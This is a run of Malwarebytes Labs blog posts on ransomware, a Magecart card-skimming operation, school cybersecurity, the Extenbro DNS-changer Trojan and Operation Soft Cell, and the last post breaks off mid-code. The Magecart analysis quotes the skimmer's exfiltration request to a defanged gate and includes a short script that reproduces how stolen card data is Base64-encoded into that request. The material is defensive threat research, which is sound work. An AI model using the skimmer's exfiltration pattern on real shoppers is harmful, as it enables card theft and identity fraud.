  • Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macros on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.

Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and tries to pass itself off as Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive, perhaps left behind by mistake, containing the usernames and passwords needed to log into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.
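The encoding step described above is easy to reproduce defensively. In the sketch below, the field names are made up for illustration; the skimmer's actual JSON schema is not shown here:

```python
import base64
import json
from urllib.parse import urlencode

# Hypothetical field names for illustration; the real skimmer's
# data layout is not reproduced here.
stolen = {"country": "US", "login": "guest", "card": "4111111111111111"}

# Skimmers typically serialize the captured form data, Base64-encode
# it, and tuck it into an innocuous-looking GET parameter.
payload = base64.b64encode(json.dumps(stolen).encode()).decode()
query = urlencode({"hash": payload})
print(f"GET /fonts.googleapis/savePing/?{query}")

# On the receiving end, the exfiltration server simply reverses the
# process to recover the victim's data in clear text.
decoded = json.loads(base64.b64decode(payload))
assert decoded == stolen
```

Base64 here is obfuscation, not encryption: anyone who intercepts the request can decode it just as easily as the criminals' server does.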

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc uses name services provided by 1984 Hosting, an Iceland-based hosting provider, which the threat actors are quite likely abusing.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk, Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna,” located in Luhansk, is no coincidence for the Magecart group behind this skimmer. In fact, the same ASN hosts another skimmer at 176.119.1[.]70 (xn--google-analytcs-xpb[.]com), which uses an internationalized domain name (IDN) and ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: problems in education security continue

Malwarebytes - Wed, 07/17/2019 - 14:17

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premises and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data, combined with maintaining an open platform for students, creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open—especially if there is a wealth of personally identifiable information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that, according to a 2016 study entitled The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid out US$3.7 million to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So what can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity

Countermeasures

Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has increased significantly now that attackers have started using Memcached-enabled servers. To put a stop to outrageously large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can incorporate cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high, and even when you pay them, there is always the chance the decryption may fail—or a working decryptor never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investment is worth it.

In fact, all of these measures will cost money, and we realize that money will need to come out of a tight budget. But funding, or the lack thereof, cannot be an excuse for weak security. Cybercrime siphons off one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hi, honey. It’s mom. My phone is acting funny again.

Malwarebytes - Tue, 07/16/2019 - 17:14

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. More often than not, though, it’s older generations that have to turn to their progeny for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of keeping up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to the 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Link-Age Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Link-Age Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices designed for older generations. The Link-Age Connect study noted, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers and younger helpers need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Link-Age Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Meet Extenbro, a new DNS-changer Trojan protecting adware

Malwarebytes - Mon, 07/15/2019 - 14:54

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

New for this one is that the Trojan adds four DNS servers rather than the usual two, and the extra pair is only visible on the DNS tab behind the Advanced button. People might be inclined to change only the two servers that are visible, but that would leave the additional two behind, so be sure to check the Advanced DNS tab as well.
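
Rather than trusting the GUI, you can list every configured DNS server from the command line. Below is a sketch in Python, assuming a Windows host where `netsh interface ipv4 show dnsservers` prints all statically configured servers, including the hidden extras. The helper names and sample addresses are illustrative, not part of the malware's actual configuration:

```python
import re

def parse_dns_servers(netsh_output):
    """Extract every IPv4 address from netsh's dnsservers output."""
    return re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", netsh_output)

def find_rogue(servers, expected):
    """Return configured DNS servers that are not in the expected set."""
    allowed = set(expected)
    return [s for s in servers if s not in allowed]

if __name__ == "__main__":
    # Sample output shape: two visible servers plus two hidden extras
    sample = """
    Statically Configured DNS Servers: 192.168.1.1
                                       192.168.1.2
                                       203.0.113.66
                                       203.0.113.67
    """
    servers = parse_dns_servers(sample)
    print(find_rogue(servers, ["192.168.1.1", "192.168.1.2"]))
```

Anything this flags that you did not configure yourself deserves a closer look.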

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPv6

By setting the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters to 0xFF, the Trojan disables IPv6 to force the system to use the new DNS servers.
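
To undo this particular change, the DisabledComponents value can be cleared again. A sketch of a .reg file that does so (setting the value to 0 restores Windows’ default IPv6 behavior; deleting the value entirely has the same effect — and as always, back up the registry before importing anything):

```reg
Windows Registry Editor Version 5.00

; Restore default IPv6 behavior after the Trojan set DisabledComponents to 0xFF
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters]
"DisabledComponents"=dword:00000000
```

A reboot is needed for the change to take effect.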


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which configures Firefox to use the Windows Certificate Store, where the newly-added root certificate resides.
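
That change boils down to a single preference line appended to user.js in the Firefox profile folder:

```js
// Added by the malware: trust the Windows certificate store (and thus
// the rogue root certificate) instead of Firefox's own store
user_pref("security.enterprise_roots.enabled", true);
```

Removing this line, or toggling the preference back via about:config, restores Firefox’s default behavior.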

Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update your existing security software is to restore the DNS servers to what they were, or, if you don’t know the previous settings, to something safe. Most ISPs list their preferred DNS servers in their installation instructions or on their website, so that is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS; you can find instructions for many operating systems on their site.

An extra step needs to be taken when you are in this screen:

Make sure to click on Advanced…and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need to restart the browser. Do NOT reboot your system, or the Scheduled Task that belongs to the Trojan may change the DNS servers for the worse again. If your existing solution does not pick up on the malware, download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes Firefox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default setting is false. You can change the setting by selecting the line and right-clicking it to get a menu; clicking Toggle switches the value between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

A week in security (July 8 – 14)

Malwarebytes - Mon, 07/15/2019 - 14:27

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news
  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.

Cellular networks under fire from Soft Cell attacks

Malwarebytes - Fri, 07/12/2019 - 15:30

We place a lot of trust in our mobile devices, given they’re among the most constant companions we have. Huge reams of data are tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information, for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation Soft Cell” haunting at least ten cellular networks around the globe. Over the course of seven years, the attackers went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The attackers behind the compromise, which the researchers have assessed with high probability to be a nation-state operation, went to elaborate lengths to nab their high-value targets. They first gained a foothold by targeting a web-connected server and making use of an exploit to gain access. A web shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there are no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller, and at that point, it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused various techniques to work their way through the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations that they were able to set up VPN services for quick, persistent access to hijacked networks, instead of taking the much slower route of connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers end with an email from Have I Been Pwned telling you which bits of personal information have been fired across the web this time. Not here, however; this was never going to end with a username/password dump.

The attackers plundered the cellular networks, gaining access to pretty much everything you could think of. In cases where the target was fully compromised, all usernames and passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit on both this data quietly alongside hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange
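
To see how much these fields alone give away, here is a toy Python sketch (records, names, and numbers are all invented) that ranks a target’s contacts from nothing but CDR-style metadata:

```python
from collections import Counter

def top_contacts(records, target):
    """Rank the numbers a target communicates with, by call count.
    Each record is a (caller, recipient, start, end) tuple; real CDRs
    carry more fields, as listed above."""
    counts = Counter()
    for caller, recipient, _start, _end in records:
        if caller == target:
            counts[recipient] += 1
        elif recipient == target:
            counts[caller] += 1
    return counts.most_common()

if __name__ == "__main__":
    records = [
        ("alice", "bob", 0, 60),
        ("alice", "bob", 100, 160),
        ("carol", "alice", 200, 230),
    ]
    print(top_contacts(records, "alice"))  # bob first, then carol
```

Stretch that over years of records and the call contents hardly matter: the social graph, schedules, and habits fall out of the metadata on their own.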

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first things first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level, nation-state-approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact to the individuals caught by this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks impacted have now taken appropriate measures and shored up their defences.

The post Cellular networks under fire from Soft Cell attacks appeared first on Malwarebytes Labs.

Caution: Misuse of security tools can turn against you

Malwarebytes - Thu, 07/11/2019 - 17:34

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner in which an individual researcher is free to upload any file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service which I am certain everyone in the infosec world uses regularly, its usage needs to be carefully thought over.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. By using a VT feature called Retrohunt, malware hunters have the ability to search for text and binary patterns in order to find malware similar to samples they may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.
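
To make the risk concrete, here is a toy Python sketch: a retrohunt-style sweep over a made-up corpus of stored submissions matches a sensitive marker just as readily as a malware string. The corpus, file names, and patterns are all invented for illustration:

```python
def grep_submissions(corpus, pattern):
    """Return the names of stored files whose bytes contain `pattern`.
    `corpus` maps file name -> raw file bytes."""
    return [name for name, data in corpus.items() if pattern in data]

if __name__ == "__main__":
    corpus = {
        "invoice.docx": b"Account Number: 12345678",
        "dropper.exe": b"MZ\x90\x00cmd.exe /c",
    }
    # A hunter searching for a malware marker...
    print(grep_submissions(corpus, b"cmd.exe"))
    # ...can search for financial data with the exact same query shape.
    print(grep_submissions(corpus, b"Account Number:"))
```

The search engine has no notion of intent; whatever was uploaded is fair game for any query.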

I will go through a few cases showing the misuse of VirusTotal to serve as a warning for users who might be thinking about using second-rate or unofficial tools, or adopting practices built on top of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an antivirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. Now, if you exclude scanning of documents from specific “trusted” addresses (in order to not leak confidential data), then you run the risk of getting malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

The use of the VirusTotal API can also be dangerous. Bugs in the code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable, or that you have done your own independent code audit to make sure no bugs may lead to data leakage.
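
One leak-averse pattern when automating is to query by hash first and only consider uploading a file after a human has confirmed it contains nothing confidential. The sketch below assumes VirusTotal’s v3 hash-lookup endpoint; it builds a lookup that sends only a SHA-256 digest, never the file contents:

```python
import hashlib

# VirusTotal v3 lookup-by-hash route (assumed; check current API docs)
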